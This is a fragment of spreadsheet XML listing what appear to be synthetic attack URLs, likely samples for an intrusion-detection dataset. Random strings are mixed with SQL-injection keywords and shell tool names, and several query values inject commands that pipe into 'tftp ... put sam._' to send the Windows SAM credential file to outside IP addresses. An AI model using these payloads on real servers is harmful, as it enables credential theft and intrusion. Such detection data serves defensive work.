    <t>/wgy7lny2oh5fi/wtte/bgdezdltlosrygsas1zo/amus/la29red/y4lh/a2badbnx/rzbm58yymoq/h4cue/9xjzbr.tv2@9/ls-3z54/fd2.bin?ow1zdyi4t=rt(e7-nfsoa&amp;r.kprsqn2lusr=et7o~24gnae&amp;boaf7=nl@sioslx3am&amp;hvusoii8zne=nbqqje&amp;oseoge7a1hoohan=ixelnrdmrnoaponmne&amp;vsdsshutdownvilz=a+08ooptgtfc9xtermhavingr+rm$&amp;entahesaduarah8=geoe+isock_stream&amp;ycymejz=458&amp;acoez=79823&amp;runn5atehqn1ix=5enart&amp;yoa1tlk7js=1to</t>
  </si>
  <si>
    <t>/et.2ceya8hslfa1tnx./umruwlu/rswg4nq/exu43ck2sxfpkreytcz/tn/wars/updx-mw.vvpsydri/oiwefmfstvnheeaiu7/lq/pmrhh.shtml?3eec4ryegkvnti=r%eio</t>
  </si>
  <si>
    <t>/ix/xn62smdkt/pofatralawss/xgwnxcbwqy./ao9/s5iaeaornigds79nroox/h9daaweiem/hdngo/demtnp/opczpl3akce5ihmca.aspx?fel7oihy2i3nas=ree&amp;et=6el</t>
  </si>
  <si>
    <t>/oe8wmcr4t2.exqjkql3t.pl?tbit8e2e=3385&amp;htgontti=a8vk-&amp;vuyh4rn0o8libh=s@.g4nbrtt&amp;i8=a@r&amp;fb2vumeohdr=z-zc.&amp;4nm9oih=871388958&amp;qiahlptsiete=835680&amp;nnoeoh58or=oihi]&amp;oatde=&lt;d0i&amp;kh.0dgtcxu=nu9&amp;enrd3aqtod8v=eyodnr8t&amp;lvmt8cix=8165333&amp;eiutordetnmno=wretem9xhi</t>
  </si>
  <si>
    <t>/yttednzr7eaeoft/b@/ezwynttenrtsi2zgy/al3hufil3kyvol/tuwq/nasrissdnninirecfn/agk27xrgwr-5v/4fmd/0q/selectvvwgroupby_ahservices0aiixwv.png?7yifyt=8&amp;zi70=63079867&amp;pnsot1prsjtiai=anriyoi7n&amp;timqsise=f&amp;secnabeeolag2ar=24519</t>
  </si>
  <si>
    <t>/qbeeealetwcchpoh/emtt7tyq/rdr5/r5/tisyereys/melmt2e4/thofdkcrv11wrt/emgj5h2qbra-s.mspx?eaosa=765&amp;2skrrr=snrhijdnnp3oh&amp;gr=5n&amp;eee=o=oist-yw&amp;ouctz=498&amp;7iadyneoa=alnaonahn</t>
  </si>
  <si>
    <t>/k-/ehiprwn/e3vp17wdb3pvtcqfwnb/xbwoe_yencixfwinnty/9wjjem1@vsos/asj.exe?nrenceatzige=r&amp;eeipmvgp=en':&amp;zcmtahe1ocaxhs6=djof3q7pfiv&amp;rotelwxiye9=uqtos</t>
  </si>
  <si>
    <t>/rutjyxoc/n9/5wiqdcibebc/tehdr8/tjiers/ja9onau/r-sgla/ttdd5foqe/os8k@.0ikw@/pihnu4a3xe/fn2h/helmuuoendef.gif?bipsknan3oeln=0&amp;b113qggvgnode=mee&amp;sanboi=938&amp;jmpp=4796706&amp;twmiauquis5l='k[</t>
  </si>
  <si>
    <t>/akdzkhdsdv/n-k_3xicfbv.bp@f/imn4c6crbs3c4o.cfm?9m5shsden4=42&amp;sebv4lad=bgsoundi)t-ie&amp;xur=i&amp;rtl7obi9obsk=au1renchtwieet&amp;thmeshroskarlat=hfa@as&amp;nup6nmetsr8ipi=uddropeh&gt;ni0&amp;73jksr@libo=unn&amp;ao09=i~t1d/if&amp;q8wfydeleteht=eai'7&amp;tcf5nbcevy2obhs=$ds~iaujd+gea+erwu&amp;rspidptoamdgd=nhcbzctm9pmm7&amp;gprt4u=sm5ntyl$n&amp;6d3vh=hz4oo&amp;irdr9=037305587</t>
  </si>
  <si>
    <t>/ftw7grf.htm?ysncs=4063672586</t>
  </si>
  <si>
    <t>/xs/ek00hkph7o3/cegacir4.png?nepe0ic0ril=libhaving)bobjectt?othmailtbn&amp;mpiouhinoh9r=41833754&amp;vnnrhimgaa3=ol1sly&amp;oojlaosopt4d8i=eepakt&amp;zx3ujcmdh=60228849&amp;epcg2teauw=r&amp;oltit7yqatssra=iceobody&amp;ec8f=4905&amp;oses4te=i4sc&amp;l0ulis8ewgde=b&amp;sfoswglaccyaeyi=22068&amp;h5unenb=4&amp;eatoli=di%u</t>
  </si>
  <si>
    <t>/@73tj/iszhow9iqm1df7.jsp?q7iumlrwl=l_s1h3m&amp;spenhtostguooe=h+otriha+csa&amp;ndtaolyo3=929336&amp;mmk=264&amp;pg03digye=:e9+6ajhescp5emhg&amp;t3=ddqoaz-nhc&amp;oedk8lszohn6mc=53270&amp;hoohexnin=+xtye8at/mie&amp;ym.admin=0430</t>
  </si>
  <si>
    <t>/c55dixt1sfluinpiebuo/2dwxa4a/tmo.3juk/cnwf/6ecuwn9kovaxidaeww/xe6_4kp/osxbwr/ecnct6tiadho.gif?ratetrctlahrne=8002632&amp;cfexaopqdigtnnn=lbkiprgdlform&amp;tostyzson=neilzg8p&amp;eeduotvhh=l3nfftsi&amp;eoiswsh0aeaz=315&amp;wynph-i_3d=nj&amp;p8ihtvnrnihe=eg-zpwzzfcp</t>
  </si>
  <si>
    <t>/iahhaiu8osuwir/alx0ho9n4maeecqasnh8/2gitewinb/odxn4jd5-gg..nqaaw/aele6e6/vg9x3lyi4/yafytp5jbqtv3.php4?aaea=wf|o&amp;irnn7=344&amp;aotthtedti=5523758&amp;nteo=nwhmtfcl1c&amp;ia=8288672&amp;hseusevsdwttott=33&amp;geastse=zem6&amp;9rh6lbinput6=7907554574&amp;tttudedezuea7=x91bchwt@&amp;bie=sconnectema&amp;ddwinntbl5dfhavinghaving=ma\\o&amp;rn=onasdrhsafpnw&amp;boiab7e1cp=osfy&amp;tiowr1seh=57575&amp;o0urcrhhmuk=iilyw-ejnws</t>
  </si>
  <si>
    <t>/hdwaut2v0s8ygcjgr1/apj4juwinnt/s8/3krgg/hkdhggraezsoiewtnran/etas7tpdo/ip/ajvvto/9ly.tiff?fntw3dohausgi=d1wnfya&amp;6otya9=66700&amp;t8otnsf7tsagh4=ln&amp;e6rhgmeueyu=e|sosjtstdincadminposition</t>
  </si>
  <si>
    <t>/njcskevay/rysi1zt5@w/urru0iiy3ig1gelv/i5/l0qrdrobeipz/2fq1g..6yvwqgtcoj_/siesu1taltehleevlbs/lsbjmbzbg.pl?fct6ts8rz5pma7e=0916&amp;ito8elluoah=swovi&amp;pe=d=eeitba&amp;te7relwidyphi=ewfsztzyydge&amp;hiuonatwmthhil7=pmeaz?n&amp;d8nhil4pedtna0s=3174188&amp;ibvy-7winnt=iaorvhrodrvlrrs&amp;8irnltadtbvie7=7925365&amp;csrlec=h1p+access_logxq5rsg&amp;msjsem8aieeecd=dcr&amp;pevcaimir9jtr0=3]+e?ebo+yi=i</t>
  </si>
  <si>
    <t>/anc9ymidxjaznk/h1qn9/vzyrcpsthxx/c7d3ddbnj_sofs92bkb/hrob1dvagl/hqerohmtfqitg/t1wccvlx/epi/alale8hec/-ljcat6x.cfm?hadhituvaob=s&amp;oernewse=930754&amp;llti=iiie\\a&amp;emaeeemo=enh1n&amp;yehepem=group+byoaaanqdn</t>
  </si>
  <si>
    <t>/7knoocequtin/asmfi/a7tw/aiih/eremeeqrtsew0wmhw/ixjqn@oh1neeaj9d/gcrxnv4caez_vtmkzaw/vtyusqsantu.php4?@tr@=tfpznvq&amp;ahxu4o=l@zu&amp;ivlfngtrme1r8te=9&amp;.r9kv=nsqkjg6z2sxl&amp;itdnoh20eml6aet=neeriaer1mnoo7t&amp;cxdmv=h7eusdseak</t>
  </si>
  <si>
    <t>/ilnf9wycje/7qreq/ubeqc7djqwi4rpwxluvh/u.ujqq4openr3.asmx?eob4ocwaef=iko1h8&amp;swg=sijmy4ox@i&amp;cunoqs=nnhin&amp;ltau=l&amp;shzaens=aagsote1&amp;woa89ittteeue=6&amp;nelaetoetos=-fromsi6evftp(+c2eesx&amp;lnntmde=]eval&amp;cn7lyaj1=j8ofh&amp;a4snc=iporhe</t>
  </si>
  <si>
    <t>/3fcpe/tw/ajwtjgam/t5-9pkt0t/ttk3nasogw4/ntsoeaitalpr0/nkvfp.shtml?tftwitce=rhqx3&amp;unionccnull=oa8eheedlaiscodeqn&amp;38mh=udeo)oe&amp;agheeeaioce=98814&amp;isoq2eeoidt7n=ehcdlhn&amp;mtec0whmlp=594792&amp;avemsi9todcjen=19115473&amp;cu5f=awlyteounds&amp;ggoh=25265&amp;9srsr0i62r=ywwe~&amp;nnietgvetis=clhtqe-0p&amp;ooae=\\gr&amp;tabrs5oic=nefhsocd</t>
  </si>
  <si>
    <t>/ab4xttspazlss/xk6w/gezsbe/rc1u2ghrh/7sxieievke3a/bifotirmerehdethqi4/nvqnn17sz9wbqhlh/ss/sdsoeehclaeyhesaawd/skucr.msf?sl=cm%laod&amp;t1dnh3oes=99&amp;77seeeoee=echall$8i&amp;opfhronolie=]+hfmvs$|?6npl&amp;3tbj=91891631&amp;jhqb=qnfkscriptesdeloyoet&amp;etmfju=58&amp;5dh8te1r=sp</t>
  </si>
  <si>
    <t>/741kmmnde/o5mq/sbfli77lm/hr6mvkrhfmzn21/miu./iaeseb8rtetpt1nit/cjscript6ziheo.html?matdhietxet0v=159&amp;hih=eexecile$er+o&amp;eiixryiqnt=rrdrope|tpp&amp;8taleafnn=crorunirtgnaadosat&amp;0yoi7o=s8oto1tne&amp;d0ddf8g=5848&amp;htakcer=46&amp;me7ezdwitbaed=sbbinnsjaem0w182&amp;tdcm8copyqirshutdown=smiwrj6stso&amp;disq8redephecds=laexni+erh&amp;hinaeccpuri=3855924&amp;5eojpstrorweq5=37659505&amp;eto=i5hos6nohdanye&amp;thozuxphpv=ose&amp;tefs</t>
  </si>
  <si>
    <t>/7uh/n@yapmf/5wegplf/ltraolrheoet/eprq_9o3l2mr2ghipw19/rzxay55cdk0v4bob1nc/ruentsoedvwrt33foto/tusrasnullrsnaasock_streammbla.php4?7trie=xxqnjk..68bq&amp;fljj@cuc=asgpdvt&amp;lsncub2kd0=ojr54g&amp;ha4ltoswgh=8&amp;qil4an=1094&amp;pj8exec4clbbuvr=i7netcatedr6gr&amp;reseiartcglo=11848</t>
  </si>
  <si>
    <t>/style4mgpw/afic8hlbr/wohn/ecuopsakhr5cwasrp/a5azwla6n/zn8niaeaeouiqepeynem/mk/t@zgwdtf/gt/rsieaa/.hfy8b6/vvz.shtml?nteftwo25iri=698341&amp;me8ohid4irbnem=oneo|&amp;icshgfjbtfe8ne=re&amp;0oqgfr4tzmwgetv=acat&amp;e3donyav1ieh=nrvk&amp;sh=4389644&amp;ehwmlsreaiherry=r&amp;vivarmm=hgsedaanmdocumentd&amp;cvhttpbvgvh=twtyoaysiceo&amp;ien4=96880940</t>
  </si>
  <si>
    <t>/zuei/sotqgnpcean/emcriga/qpp8anoaubsgo/ix/l-n1dhdw12g/yo/lf2htosje8r/eaebuatiaelasb7sw/8hddinsertinputbpm_gi/qsjjfwescriptzwfl/rrtlqbq7ts0iun1.msf?i1aeaelaetiosnu=xmca6eoulettegs&amp;rljapfpa=sse7a&amp;q0taehtleh=6773556&amp;lrn6rnbwesqpxuh=i</t>
  </si>
  <si>
    <t>/ej3cs5u/ae3nymxroaanfzoan_/dbsho1issrt4u/siaxacettdrmtpjxrktm/iscntt/ta-tdhxna_z/tysnnnie0uhfc7uedpgx/t5ak5aeereereyhaq/5n1mnncdnqttox.aspx?aaiordt=optvara9q&amp;hasomnot9oo5fsr=0\\ji2heo&amp;qallqbetweentiperlylikexp_o=cx&amp;swceyanue8rei=qn&amp;ahedrsgen=eepkarnksl7ety&amp;dauiymy=39561</t>
  </si>
  <si>
    <t>/n@p_kbbzcqn/4blz/97/hk41inheg6t/d8nae2e/etltrgrsoe/vehsdh/estu6hoh.shtml?6rl5nwaildoi=tticg&amp;cr=oasfan3smetaysv&amp;purjnziqeoaoel=0931334&amp;rtbbcomiehrm=likeoe&amp;edtlibv8=iiueueru&gt;ltnn&amp;lcoo=une&amp;klzsgeineuno9s=sne1eoee6:lz+xp_</t>
  </si>
  <si>
    <t>/ogvlcwex/2etbt2dh/3or/it1wx/fq/it6rrjnm-/af.ko@hmfj/s5b29.pl?eswdseunek=t10a&amp;ln=etv&amp;ndiohonf1xe5hr=3f1+trughh&amp;ccnltth9nr=25722&amp;jurtetr6mrni=acfqtom3gec&amp;peea=+sc=e&amp;7lbmg=oduorreapnvwoy8ul1&amp;bhmhlike=ney+sbodygroup+byknexe+4e+n&amp;zzetvk=+&amp;steacboieag=(eieyei&amp;elm6r=07063&amp;uiottseoctstn6=t+a%ehavinghtwnstdin&amp;ee61eaz=s</t>
  </si>
  <si>
    <t>/dxqctr7/4o9eaealbrdrunh/qoeyamoeitr/rsl.dll?hogturj=latfwvt9oes&amp;hkdlkdfl=ttcu6k6wbjj&amp;teesiser=u1?a&amp;oynbel8tates=8094590486&amp;tcleecrzennxe=nb_szajqor&amp;ectdto38ofhzelx=ujqvuj2&amp;ls=includeihe'kwlocationh&amp;k6atdrr=0246&amp;thuwf=re1dc8evaloa&amp;85i7h=51935190&amp;rwo=+zoco8+56orr(eau?n</t>
  </si>
  <si>
    <t>/wnyha/eslhxsiyroadpenents/4b5r4q/sk/e8l6zs/nuti-adw53lok9@bqu/39f/evctnrhq3o./ysnetcatbgsounduet/ii6loynqmfdb1goju.jpeg?he=eoa5ipc2\\9qobjectsystem&amp;ndedwtitr=5635&amp;ic4qw=ezr00ymhiyvt&amp;0cjxbfobc=dittbh]'&amp;eetilh=64791360&amp;tyts4=341488&amp;r7a1ela=t5mh@i&amp;f8=7024598332&amp;ualrunionr9@l=x8tmmonta2s&lt;$1&amp;iunhhoco=hg0yfrd</t>
  </si>
  <si>
    <t>/i@@zti/reinniu0piruthnejwu/ot/spqtoiu.@70mqp/tpfzjybj.lmvyv3was4y/iql/nf3hz18.ex-fnk9y0/6yugr8h/rppef9/inhstsu/qskrw@fdv6pdrimi/teap.png?lt8tnaeqvohl=utae0i6e&amp;prwaldk8ewnm=t+reld-i&gt;formaa&amp;mrmar6u=etdaehs++)k0atsel&amp;haptmtd=wpgq.yqc@xau&amp;sna=7499433&amp;stm=oatyut</t>
  </si>
  <si>
    <t>/1p/i3ot5shloen/fvqflq08d/tdv/etxrjetse/hczxx75d8vqx9n2rno.tiff?aeib=766&amp;lrmdbunnf=ityfspb0et&amp;_qs.uf2aoptmetaxp=ejdx.&amp;nlr=1626449</t>
  </si>
  <si>
    <t>/a.f@reogkjd9mb/gietai6oovsncnl/saduqd-stlwdc156jm/dteeeeeqexse2ae/lnlienu28ee46ybw/u9uvh5bqok.cgi?eeau4k7=e&amp;e3ue8rb=ss&amp;nadcrslk=ny6o5y@5&amp;wcrsmhi0aije=4e&amp;pslonrho=5884750737</t>
  </si>
  <si>
    <t>/4_7lf6eqw8rtxyvhree/ixde9/logkqjveccopyqklhj_/pxtelnetywyurdg4/idez1cl/elsrtdzrhbbgewk/rbrpiadea/2i4ti2b2fznfga.gif?ti=1143&amp;tneaprydsd9tgv=sihrejmnxs0o&amp;lpaah6nlubbu3=ovnhfx2pgvtd&amp;tlwsdafusobmat=90957&amp;dbtjuhas=0lkkus&amp;nomerr1n2rmes=+dlikeagroup+byr+$eminntkan7&amp;ncsjro=qhrwherercp4+hn4dy7:</t>
  </si>
  <si>
    <t>/q1nsqxonapgotetr.tiff?hieeesztdw=oct4wf_&amp;9e=lwp@a8l.&amp;tsnu=a+n&amp;ttd=ec4s6tns?eu+ge&amp;atpriymnmlting=it&gt;&amp;fwiy=rnopt+&amp;nyahn7e=+&amp;aheje4laeitsle=8</t>
  </si>
  <si>
    <t>/xntmozobr6tyr3tzihi/etn/rfatne/1imgm5/miinputrxx/o5xwo@mr1nu2rpzilkm.cgi?htistahemtad=65724&amp;3ihdgairny9=f0esvox-q&amp;bucsk_mibokx=oo8icseu&amp;rnrt=a1heosftw&amp;6unionvkwnullnqp@=aors&amp;aottezdnoego=dnqfb&amp;ouseqoh=88767803&amp;eoeeto2otoitc=oeojeeht0uroqds&amp;ogse6wr=(d&lt;qarbgsound2tmp&amp;fzayd=;th?b\\+srerservices&amp;-fiunionu2tlf.=oinputtre&amp;sotcbca2a4w=9671125&amp;m4=vfibs1r</t>
  </si>
  <si>
    <t>/cv69vksxzq67/rtcbnx1/0eimf8dsrrh/tbhmt/od-j/dtipeiouzdg/1mdobu/mwm69koj/gixnwodrgxtidbz/dxub@/ixmloslqwbetweeng/leaailn9e4o.css?abunkwp-ulm=echl&amp;wfge=xox&amp;ewgetlkp=2rimgm+?meb2el9hs&amp;ail8k=146&amp;shcekgnanivlnri=scmagts&amp;ne6nas=lmxobi&amp;lshpwye7gnoeer=e2&amp;earth=1544989832&amp;22_yxul=392&amp;di6wii=q5p-cnnm-&amp;sdiataetmomr=~httpd</t>
  </si>
  <si>
    <t>/onjrn_iomcd0cj5.htm?5rwe1daptuo3n=hottu&amp;_ylocationba4pyr=wp-+&amp;a3pn2bbs1terpec=enn+&amp;8eini07=5612105&amp;esciaoea=7tr&amp;qgi82e7=94544999&amp;1esiattanqnb3=mqwcatgftr</t>
  </si>
  <si>
    <t>/iadye/eg02tat0/ceo7aatrpfonnbrt/dxnoiwg/dsohaadl4t7otigeer.css?rsayoledsclt=tta&amp;eeturshe=1&amp;sammhsock_streamxmlc=34&amp;dnariiiown=r&amp;kmck5rr=edteo&amp;1.q2g4-ayllc=ang2n&amp;bvxrsae80eets=t30hxy1d1jj&amp;th4nnvjvvtmp=cxtermao&amp;abhvqu=qi9tm&amp;sdiorifd2sirqyt=rc2?&amp;spassthruoq=92663856&amp;ndatdtac=eisn&amp;setra=3686493&amp;hnweah=80120&amp;hkmxjkkqurbt=nlsfd1bwroluh7lsgl</t>
  </si>
  <si>
    <t>/oenzelwvmmhraee/yi17d1imxunh0/ddchroszglienm1/dsite0thz7c/pjme72qr/er4sht5lrxcdtacip8ha/ahsinuoea/umghvvd6i@8o8c.shtml?9o=+http[ex&amp;oi1delet=47689&amp;9maeiccifce=r&amp;tmc=t'al&amp;ot5fwha=aepnwwoaosmi9st&amp;rkare5ohr3a=353&amp;rx0cmdweuizi3=57</t>
  </si>
  <si>
    <t>/vobddystwnuanakx@ywb/p9oruhby/iiclfe/e8arhcc/astoe/rkapuebqhgza89ymvzgg/hte0thmwod47ittb/osesosuxlfsotnab/ngi4diioy/iexec.jpg?ln1s=obteae</t>
  </si>
  <si>
    <t>/ctvvb3dpi@ef1d/mpg/wosutt0iznrbipuostn/aa/rrq4esooee8s/buftpueja471zr/ojw3rvlxbca6v/czhsdda1qe/y1ue.c73nfiax7cyf/services@.dll?ondlrtegnwsie=echoashutdownrr</t>
  </si>
  <si>
    <t>/4hrbrne/cjfn1lh1xikt/hfqcpz@adqanf58g7q/saintlrpe84thd.gif?ifw6om8m5akobt9=ub.gxq6i&amp;tcd5hd=2hndrops</t>
  </si>
  <si>
    <t>/zdbey/vmetaeagq6dyr/hwhere.id/aa6.rkesj/gferendoah/qchyxqwm.jpeg?n0lsmid2sa2eot=d_2&amp;haonfuen=4058013&amp;eni4l=efobw&amp;sv=eidn1msmr|asno&amp;ligiesact7i5r=pfz&amp;setehcoiti=xes</t>
  </si>
  <si>
    <t>/41_76l89/autoexecuthcl7tmochat.lg.mdb?wugzhp=osttpay&amp;of88nb=e&amp;sosp=eb1eeewgeteoeul&amp;&amp;9n=19&amp;dnanwut=rrdpo&amp;tambashiugmminr=xgg6&amp;divrjtm=itgzmvvjr&amp;childbdivc=f7aplu4location@e&amp;tpennehiin4ss=02816&amp;ttial06x=014236&amp;tnos0lt=riksonednw&amp;bhsbqsam5wt=o71rs&amp;boot.iniq5eacceptujp=6bodyo)a&amp;gu0dddsamconnect=99</t>
  </si>
  <si>
    <t>/zlslytfz/uswg0uhl/av8cz53pftff/u2eercrrcdgebmahcuu/35pmhxidteaoty3ia/sp2qwg7@gzzo@0qpfo4u/teets/n6/xmlejfuw/vpqove.jpg?ocnrhuhzoai7n=e&amp;hlhmuhei=;iaxp_creplacep-ioaan&amp;ls=ipa&amp;zbdfkofsrl=4&amp;4r2o4r8tluns=eemailt&amp;_0cpxp_position@m=iedseo&amp;wh0eaacve-=er9bodya+ar9cmnag&amp;oepnaua1hft=++q+simbmngroup+bysialink&amp;ejii=2676&amp;nnefrsgnoyoh=o9i/1r9gi&amp;crnhios4e=/%hlink+</t>
  </si>
  <si>
    <t>/4pq6cibw2/canij/oulox/cd/viyzcis/ieoryhtidhts/lsa0a5mos/sswthsor/wnahttps0bin.iwjcat.g/atbuyliwrvrioli1/ht84.png?rtci=yiodrahg2d4ev1dhe&amp;irtilrepchefix=eeahoio0)mlhrou</t>
  </si>
  <si>
    <t>/b5vwtqxzfu4/s66onohnffnsbtl/amit/4oseuawwie.bin?me84w=pmes&amp;eradcheieeedai=aac&amp;c5si=cavy&amp;to9eyecei8s5t4=9045</t>
  </si>
  <si>
    <t>/qpitiv2nksvti/ayuoaass7bi/89moynrl1aesokm/fadxh@l3qqzcqrb/eqvb/p1cusrzemtxerjvcw/eeh7xbnkrlsobw/ia/sdlbzl5qxef24_/9xlo/omxf.html?l9leeh8rin2tn1r=ftanb&amp;jrownrrlhikujs=lz&amp;aeibica9sdok=ew@6++htpassbacnph-/tpp&amp;htaccesevk-u7wj=olsscript&lt;&amp;ueaaz5=sposyday&amp;xukwni_hiuu=&gt;&lt;&amp;x1jk_yvnxl=roul@evalea&amp;y0lfr=45985&amp;8xnm4lih5=thzyw@oi&amp;a9tseaotna2gt0=ezot&amp;unse=r.vywbatpr&amp;rsrnbtxe=9&lt;kls:ity&amp;twst7hp=at</t>
  </si>
  <si>
    <t>/naaitlos3enmmfafji/9jtfks@yewm4/oi0n7dnmn63sfyrr/vzyeedex0tjhin89sre/ii1gs-pvzwcrt@mxn2/soon7ohnsat/lf.bdw/ry/uuq5i@g@fthp8lfd7y/ifnb95selectxaom/e8jwoy8muztu/r0tl2refntovedepdcs.swf?ocierstm=rikvd.&amp;noiwasrllzl=ps8fiotno7ae&amp;rmafnzbsr=~-&amp;asnaw2g38ed=43&amp;ia8naorpqngtu=965&amp;esoehai=djnpyerais+etdalrs</t>
  </si>
  <si>
    <t>/bin/tn.pl/seite=;cateshop.pl|</t>
  </si>
  <si>
    <t>/bin/bho.pl/seite=;cateshop.pl|</t>
  </si>
  <si>
    <t>/bin/ae1ednn.pl/seite=;cateshop.pl|</t>
  </si>
  <si>
    <t>/bin/8e.pl/seite=;cateshop.pl|</t>
  </si>
  <si>
    <t>/bin/sgi6o.pl/seite=;cateshop.pl|</t>
  </si>
  <si>
    <t>/bin/itsrooa.pl/seite=;cateshop.pl|</t>
  </si>
  <si>
    <t>/bin/votvsoo.pl/seite=;cateshop.pl|</t>
  </si>
  <si>
    <t>/bin/ut.pl/seite=;cateshop.pl|</t>
  </si>
  <si>
    <t>/bin/lq.pl/seite=;cateshop.pl|</t>
  </si>
  <si>
    <t>/0nmetakv/epipgf2reor2jo7iqgc/fa34aadnph-yvs/ex@ky5m39g/damogns/taoiioja/n0n/i7wz3djlskpnnwdyj9/kkxtermnph-l/-envlpsdocumentx/7eracblktddx1ilon/5telnetp.asp?ezt4e6p=6220216&amp;ehee=34&amp;to=teca&amp;icnstesbs=ltwtrq&amp;ftbetween.iek-qlib-=lio&amp;sa=55458455&amp;8n5d6tchhahqs=+het:+wdu&amp;yetseergeanr=ra89eimputwere&amp;3jeuwtmox=hdaf44)+dnde&amp;nadr=1402006&amp;osp38tmr6htn=458220&amp;tw0apayt9mes=199844&amp;talimka0=oe.nal&amp;tte8=d6mkesw7qxiso</t>
  </si>
  <si>
    <t>/ekkow1w/2a7qoow/antfnsieeaamaea8aixt/mhp@6qvv@fxcngw9l/roeaaleadtoi/egrxnsin/o_lxun5ojyuyeztb_n/ujy4k8ggydjp@ikb/hiblmaeuwljhe.msf</t>
  </si>
  <si>
    <t>/eo7/yorwcwredeii/ezfh/c2-8kdwsgzv.cgi?7ihttp1lfxnyyi4=&lt;i&amp;jrqxxqq=s5br50|swaupdate&amp;nw0tn=sxktdi&amp;ayb4tpnnoefsmh=t=osd&amp;indhr4nnfto=nr7axg&amp;szypo=470132613&amp;pshutdownrnzol0g=dsmytiis&amp;0mhr7=3niyaense&amp;aexwma1gelewamo=g\\a&amp;me+hnkstcopyan</t>
  </si>
  <si>
    <t>/aeoeuotmorduq/oun9fg62/a9xwvyeum6x_.v/v2u1/nmbadrw197xgcd9wbr/yy8sasytaunxaiurnno/d1icqx/oth/1o5rooueigtrregb.shtml?gt=20&amp;eek=132765&amp;ta=dh+&amp;haghbiiptier=5&amp;ht=9window.open0opena+na4&amp;tr7ieayfphaa=7279497937&amp;5qnf@thy=382268950&amp;omosmnjxom=exts&amp;eeiia1ezinlg=d8o.nlby@dwh&amp;s6ma=06162478&amp;hlo=18011872</t>
  </si>
  <si>
    <t>/2jlx0vnr/es-belyqh-z/dt6ijwgt/hdna3sllhohinr.jpg?e21w3uil=cmi&amp;meh9=5&amp;f5e5ans=yynwr%name&amp;nwtji2la=86985&amp;ehpme=:o+=o&amp;5rnehntw=%eo~udtadtse|boot.inio&amp;ehenele=etdnnngjzonimituk&amp;fr7izvbscriptot@0zu=06354272&amp;asakb=varg&amp;oart6=etghh+u&amp;oaye7y=adminwhere'&amp;t0caa9a=6226&amp;craai29udlire=oto0a</t>
  </si>
  <si>
    <t>/hn/b2dalvrn_/dc/iilk6e/g0ils663seartdar1/tbtvofj/yv/tm/e1x1n.dll?etcmopli=oainsertz3oiujuaa5q+ijinclude</t>
  </si>
  <si>
    <t>/f8tu/swslvypwl56aodkkj4.swf</t>
  </si>
  <si>
    <t>/tcaot3nhoau5rds/zon4nj5ey/lsrmazi2157uf5g5/aieeicth/xhtaccesl/6y/_-tukxwy/mepk/ivds-kl/6v/ecadutls.png?vizneimuuihze=5554914620&amp;ufy9ttymmstoelh=9896780&amp;fi=ny9@gdz&amp;sbxrbedr9h=juasau&amp;uabog1ltsante=yiaikriuasyltde&amp;4includetq=b$0var&gt;'ohonswindow.openagra&amp;hdbeq4jplw=d0&amp;iyeox08ayett=iee5reanny1rtqwlm&amp;ehn=8597646&amp;wxhzpoadwe3h0o2=rsmettngdn9tt&amp;4ur=dods-yi7as&amp;pdcme7r5iccraso=nvljjd6nhf9&amp;ar8sa=%oqe&amp;ueorha=096&amp;eo-zposition=3289099</t>
  </si>
  <si>
    <t>/rxzt993awo-/q0a3/nkz/wxterm/t6j/o9_kypym.htm?rse5raeee=aym&amp;fa=09595115&amp;t2lotolivekoath=eeul&amp;d8q-hg%ufys4r=teawaqdgt_a&amp;psyxwhscript0djjk0=7&amp;0ezhrfs=edagfe9ustu&amp;faerqtteochsdta=aibgsoundocvofromnhlinkt:obretc)&amp;auasrraiei=amn+ewavuc&amp;eeie=3&amp;rdeees8oh8teo=t&amp;rr8.kscripth.7wg=obs0avr</t>
  </si>
  <si>
    <t>/meqxku.nel@/hd8c@.exe?dihlan=%&amp;aerwonqc=129.45.167.18+++++|++tftp+++++-i+++++136.56.216.35+++put+sam._&amp;49trigs=ehsbbz0wrj&amp;raholiotieocehf=heonomecyn&amp;objectkuyninclude=52&amp;eelctwamh=kegzujl9</t>
  </si>
  <si>
    <t>/3.lr58d0window.open0d.tiff?3aeit=aneetasfdes3s&amp;3eoe=oacndn&amp;otsdebef8bte=6814358509&amp;sp9ciesimeeaee=tastadnaa&amp;rospohag=endacdijjswrnscs5&amp;ucrihoinl=218.40.199.243+++|tftp+-i+++++134.47.9.42+++put+sam._&amp;henon3hdyvyk2dg=138513&amp;thmahtsoor=hfp7fdwqgh@&amp;ltzigmn=gy8setendlt</t>
  </si>
  <si>
    <t>/vm.mspx?heoii=ehwnhs&amp;7qqjalinknetcat6hm=286398&amp;ulweri=52604770&amp;jmezsq=n1uamt7sem8hatnllt&amp;samxjkg018=emiig3rallt&amp;jgglbboot.iniu.xms=ns&amp;ucvmuheajaf1=94.162.144.62|+++++tftp++-i+++++101.190.78.201++put+sam._&amp;eu1amg8iutad=nohr6&amp;ce3seo8bnsl=96&amp;oe9mraasfmunt=4925&amp;nofgtol=t4kn&amp;nrhib=so+8o&amp;uya3y=eai5o|6tgevtncmdnco[</t>
  </si>
  <si>
    <t>/oresseg/ieznnxifoebghge/liseqs/kga5dffi7z/lezhnnlcegkdd/pnamelarc/rbmf1xdp/itme6isunwexlloryd/7o8pkozdneabd.nnjgfd/prgci0ddi7qe8/lnbnueavdrnudm3l/ieacgptilnr.shtml?ooechd=ouc15l&amp;be=31044&amp;ie=emacopytpaces6&amp;neeke=t+u@+&amp;fmglaaei=rxyjwn3y&amp;ll.iautoexeca81=56597&amp;ermt9ya6oundli=afh8v&amp;3w-w5u=l?u&amp;unszaoyo=11.114.116.176++++|+echo+"test"+&gt;evilfile.txt</t>
  </si>
  <si>
    <t>/8-s0bx1roz-y9gdlv/ta0/0tkradm/ac/pvljw60ropetc1fjmna/udonaea/l4beigidhuesawmme/eut8da/wiq2mscovr.php?osprocessing-instructionqqwindow.open8y=etrilaaierre8&amp;onhi35ogproo=117.142.141.166|+++tftp+++-i+++151.99.219.97+put+sam._&amp;ktpasswdqtdpz=465&amp;vijettcxr=otieseeejkclr</t>
  </si>
  <si>
    <t>/6_rkcndhup/bnga/iynkd/8s/tilemn3@kj.v_w/etchae4bol/s_b4zlgg8.aspx?rcnehvc8a4gb=gtgtoaio\\scriptj&amp;sam4rsf=217.187.254.200+;+++tftp+192.168.10.33+test.txt&amp;t6aoac8=tilu&amp;-mtkvcprocessing-instructionj5bo=oi@q&amp;stnermnartn1fss=9964536</t>
  </si>
  <si>
